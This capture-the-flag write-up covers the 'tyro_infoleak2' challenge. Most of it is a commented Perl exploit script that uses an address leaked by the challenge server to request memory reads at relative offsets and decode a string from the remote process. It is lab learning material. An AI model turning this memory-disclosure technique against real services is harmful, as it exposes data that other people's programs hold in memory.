Rating:
Task:
Baby's second infoleak, a tiny bit harder. (https://en.wikipedia.org/wiki/Information_leakage)
Server: 172.31.1.37:1615
Binary: 172.31.0.10/tyro_infoleak2_3a3b043ca422415917e99afdc20618e5
Approach:
This task was identical to infoleak1 except that absolute addresses were no longer accepted: each read has to be requested as an offset relative to a stack address the server leaks in its first reply. Since our infoleak1 script already computed its reads relative to that leaked address, solving this challenge required only trivial modifications to the script below.
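#!/usr/bin/perl
# Exploit script for tyro_infoleak2: read a string out of the remote process
# by asking the server to dump memory at offsets relative to a pointer it
# leaks itself, since this level rejects absolute addresses.
#
# Protocol, as far as this script exercises it:
#   1. send "0\n4\n"; the reply contains two 0x-prefixed 32-bit values, a
#      stack address and the address of the target string. The greedy ".*"
#      under /s means the second capture is the LAST "0x" token in the reply.
#   2. repeatedly send a negative relative offset "-XXXXXXXX\n"; each reply
#      contains one 0x-prefixed word, which is decoded and appended.
use strict;
use warnings;
use IO::Socket::INET;

# 172.31.1.37:1615 -- challenge server (hard-coded, as in the original run)
my $host = '172.31.1.37';
my $port = 1615;
my $words_to_read = 14;    # 14 words * 4 bytes = 56 bytes of the leaked string

my $sock = IO::Socket::INET->new(
    PeerAddr => $host,
    PeerPort => $port,
    Proto    => 'tcp',
) or die "connect to $host:$port failed: $@";

# The fixed sleeps before each recv() are crude pacing that worked against the
# live service; recv() may still return a partial reply, which is tolerated
# because the parsing below only needs the "0x" tokens.
sleep(1);

my $linebuf = '';
$sock->send("0\n4\n");
sleep(1);
$sock->recv($linebuf, 4096);
print $linebuf;

my $decoded = '';
if ($linebuf =~ /0x([0-9a-fA-F]{8}).*0x([0-9a-fA-F]{8})/s) {
    my ($stack, $string) = ($1, $2);

    # Distance from the leaked stack address down to the string; every later
    # request is expressed as a negative offset from $stack, never absolute.
    my $offset = hex($stack) - hex($string);
    printf "Offset: %08x, %08x, %08x\n", hex($stack), hex($string), $offset;

    for my $cur_bucket (map { $_ * 4 } 0 .. $words_to_read - 1) {
        my $request = sprintf("-%08x\n", $offset - $cur_bucket);
        print "Sending offset: $cur_bucket\n";
        $sock->send($request);
        sleep(1);
        $sock->recv($linebuf, 4096);
        print $linebuf;

        # Accept only hex digits: \S would also swallow trailing punctuation,
        # making hex() warn and decode a wrong byte.
        if ($linebuf =~ /0x([0-9a-fA-F]{1,8})/) {
            my $val = $1;

            # The server prints the word as a number, so a zero high nibble
            # is dropped (0x0a414141 prints as "a414141"). Left-pad to an even
            # length; otherwise the pairwise split below shifts every byte by
            # a nibble and silently loses the last digit.
            $val = "0$val" if length($val) % 2;
            my $bytes = join '', map { chr(hex($_)) } $val =~ /(..)/g;

            # The word is printed most-significant byte first, while the
            # string is laid out in memory least-significant byte first
            # (little-endian target assumed), so reverse to recover text order.
            $decoded .= reverse($bytes);
        }
    }
}
else {
    # Don't silently print an empty result when the first reply was unusable.
    warn "could not find two 0x-prefixed addresses in the first reply\n";
}

close($sock);
print "Decoded: $decoded\n";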